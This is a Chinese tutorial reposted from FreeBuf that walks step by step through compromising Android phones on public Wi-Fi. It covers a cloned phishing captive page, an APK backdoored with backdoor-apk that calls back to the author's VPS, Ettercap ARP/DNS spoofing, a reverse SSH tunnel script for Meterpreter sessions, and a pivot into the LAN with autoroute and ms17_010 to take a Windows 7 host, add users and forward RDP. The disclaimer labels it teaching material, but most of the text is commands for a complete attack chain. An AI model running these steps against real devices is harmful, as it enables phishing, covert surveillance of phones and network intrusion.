MSF外网持久控制Android手机并渗透测试局域网

栏目: 编程工具 · 发布时间: 7年前

内容简介:MSF外网持久控制Android手机并渗透测试局域网

* 本文作者:求一份网络安全实习,本文中提及的 工具 和技术方法仅供安全教学用途,禁止非法使用

以前经常看Freebuf,学到了不少东西,现在想给入门的同学提供一点微小的帮助。以前老是不知道如何在外网使用msf这个神器,自己查了查资料,总结了一点自己的认识。

0. 环境:

a) Kali 2.0 (咖啡厅:192.168.0.2/校园网:172.16.X.X)

i. Metasploit-Framework

ii. Ettercap(dns欺骗)

iii. Backdoor-apk(apk后门)

iv. Python -m SimpleHTTPServer 80 (轻量级HTTP服务器)

v. SSH Tunnel (外网打洞)

b) Vultr vps 一台(Ubuntu 14.04)(公网IP:45.77.xx.xx)

echo GatewayPorts yes>>/etc/ssh/sshd_config

c) Android (魅蓝E2 Flyme by Yunos )( 咖啡厅:192.168.0.3/家庭局域网:192.168.0.3)

d) Win7 x64 sp1(ms17_010)(家庭局域网:192.168.0.5)

示意图:

MSF外网持久控制Android手机并渗透测试局域网 MSF外网持久控制Android手机并渗透测试局域网

1. 构造钓鱼页面

a) 首先我们在电脑上登录CMCC-EDU

b) 弹出一个页面

MSF外网持久控制Android手机并渗透测试局域网

c) 该页面会提示下载一个 免费上网1.pak .我们正好用它来制作后门

d) 保存该页面到桌面, 将 免费上网.html 重命名为 index.html 并放到 免费上网_files 文件夹中,然后修改HTML:,

替换页面所有apk地址为免费上网.apk,并添加<iframe src=”免费上网.apk”>

MSF外网持久控制Android手机并渗透测试局域网

e) python -m SimpleHTTPServer 80 #(在index.html所在文件夹直接启动HTTP服务)

2. 使用backdoor-apk制作apk后门

a) 现在我们

git clone https://github.com/dana-at-cp/backdoor-apk.git

b)

cd backdoor-apk-master/backdoor-apk 

c) 将 免费上网1.apk 复制到此目录 并且重命名为 mfsw.apk

MSF外网持久控制Android手机并渗透测试局域网

d)

./backdoor-apk.sh mfsw.apk

e) payload 选择 3

f) lhost 填写 vps 的IP地址 45.77.XX.XX

g) lport填写 99  (vultr 会封掉一部分端口,比如默认的4444)

MSF外网持久控制Android手机并渗透测试局域网

h) 然后进入 original/dist 复制mfsw.apk 到 免费上网_files 那个包含我们钓鱼文件的文件夹,改名为 免费上网.apk

MSF外网持久控制Android手机并渗透测试局域网

MSF外网持久控制Android手机并渗透测试局域网

3. Ettercap 实现 DNS 欺骗

a) 查看ifconfig

MSF外网持久控制Android手机并渗透测试局域网

b)

gedit /etc/ettercap/etter.dns 

* A 192.168.0.2

*  PTR 192.168.0.2

MSF外网持久控制Android手机并渗透测试局域网

c) 开启ettercap-gui 选择wlan0

MSF外网持久控制Android手机并渗透测试局域网

d) 扫描hosts

MSF外网持久控制Android手机并渗透测试局域网

e) 选择欺骗 192.168.0.1 和 192.168.0.3 (Android)

MSF外网持久控制Android手机并渗透测试局域网

f) 开启Arpspoof

MSF外网持久控制Android手机并渗透测试局域网

MSF外网持久控制Android手机并渗透测试局域网

g) 加载dns sproof  模块

MSF外网持久控制Android手机并渗透测试局域网

h) 手机上如图:

i.

MSF外网持久控制Android手机并渗透测试局域网

ii.

MSF外网持久控制Android手机并渗透测试局域网

iii.

MSF外网持久控制Android手机并渗透测试局域网

4. msf 通过SSHtunnel 接收 反弹meterpreter 会话

a) 下面我们切换kali连接到其他wifi,

ifconfig 查看一下当前kali ip

MSF外网持久控制Android手机并渗透测试局域网

当前地址为 172.16.8.181 ,我们等下还是能接收到来自Android的会话

b)

vi sshTunnel

c)

#!/bin/bash
if [ -n “$1” ]#判断参数$1是否为空
then 
echo 0.0.0.0 $1”--<>--”45.77.xx.xx:$1
ssh -C -g root@45.77.xx.xx -R $1:127.0.0.1:$1#这里是相同端口是因为,msf监听不到45.77.xx.xx:$1 会自动监听0.0.0.0:$1,刚好能正常接收会话
else
echo 0.0.0.099”--<>--”45.77.xx.xx99
ssh -C -g root@45.77.xx.xx -R 99:127.0.0.1:99#默认监听99端口 
fi

MSF外网持久控制Android手机并渗透测试局域网

d) chmod +x sshTunnel

e) ./sshTunnel #默认99端口,运行sshtunnel 来实现 vps:99 到 127.0.0.1:99的转发

f) 其实这里已经有会话反弹过来了,只是本地msf监听没有开启

MSF外网持久控制Android手机并渗透测试局域网

g) 现在我们开启msf监听

cd backdoor-apk/backdoor-apk/
msfconsole -r backdoor-apk. rc  

MSF外网持久控制Android手机并渗透测试局域网

h) 可以看到会话已经建立

MSF外网持久控制Android手机并渗透测试局域网

i) session #查看

j) wakelock #保持唤醒防止掉线

k) session -i 1 #切换到meterpreter

MSF外网持久控制Android手机并渗透测试局域网

l) 截个图录个音啥的都不是事,能中招的用户肯定会给权限的,毕竟不是所有人都是有安全意识

MSF外网持久控制Android手机并渗透测试局域网

m) ifconfig#查看Android的网段

MSF外网持久控制Android手机并渗透测试局域网

n)

run autoroute -s 192.168.0.3 #添加自动路由
background#返回msfconsole 

MSF外网持久控制Android手机并渗透测试局域网

o) 现在msf已经获得192.168.0.0/24网段的权限

但是我们还是有访问该网段的权限,扫描一手ms17_010

MSF外网持久控制Android手机并渗透测试局域网

p) 既然是有ms17_010那就好办了(为了方便以后控制,加上bind_tcp正向连接成功率会低一点,所以使用reverse_tcp)

MSF外网持久控制Android手机并渗透测试局域网

MSF外网持久控制Android手机并渗透测试局域网

MSF外网持久控制Android手机并渗透测试局域网

MSF外网持久控制Android手机并渗透测试局域网

MSF外网持久控制Android手机并渗透测试局域网

MSF外网持久控制Android手机并渗透测试局域网

q) sshtunnel 打洞,45.77.xx.136:88->127.0.0.1:88

MSF外网持久控制Android手机并渗透测试局域网

r) 可以看到,msf自动监听了0.0.0.0:88,这就是转发到相同端口的好处

MSF外网持久控制Android手机并渗透测试局域网

s) 这里win7 x64会重启,然后获得会话,可以看到win7的会话也被vps转发回来了

MSF外网持久控制Android手机并渗透测试局域网

MSF外网持久控制Android手机并渗透测试局域网

t) seesion -i 2 #选择Windows的会话,并开启远程桌面

MSF外网持久控制Android手机并渗透测试局域网

MSF外网持久控制Android手机并渗透测试局域网

u) 输入shell,进行添加用户,这里也可以用 run getgui -e -u admin -p 123

MSF外网持久控制Android手机并渗透测试局域网

v) 下面我们可以使用

protfwd add -l 1234 -r 192.168.0.5 -p 3389

将win7的远程桌面转发到本地1234端口

MSF外网持久控制Android手机并渗透测试局域网

w) get it!

MSF外网持久控制Android手机并渗透测试局域网

MSF外网持久控制Android手机并渗透测试局域网

大三狗,会写Python,懂点Web安全,想去给网络安全公司的大佬端茶倒水(求一份网络安全实习,谢谢)

* 本文作者:求一份网络安全实习,本文属FreeBuf原创奖励计划,未经许可禁止转载


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

深入浅出Ajax

深入浅出Ajax

(美)Brett McLaughlin / 东南大学出版社 / 2006-5 / 98.00元

本书将教会您如何在很短的时间内掌握使用JavaScript代码来向服务器提交异步请求?同时,您可以学习如何使用诸如动态HTML、XML、JSON、DOM等技术来解决开发过程中遇到的许多问题。让你从那些繁琐而笨拙的网站开发技术中彻底解放出来!本书将是一本指导您进行异步开发的经典参考书籍。   作为一名网站设计人员,您也许时常因为遇到以下情况而烦恼:用户只是移动了鼠标就要从服务器重载数据......一起来看看 《深入浅出Ajax》 这本书的介绍吧!

正则表达式在线测试
正则表达式在线测试

正则表达式在线测试

RGB CMYK 转换工具
RGB CMYK 转换工具

RGB CMYK 互转工具

HEX HSV 转换工具
HEX HSV 转换工具

HEX HSV 互换工具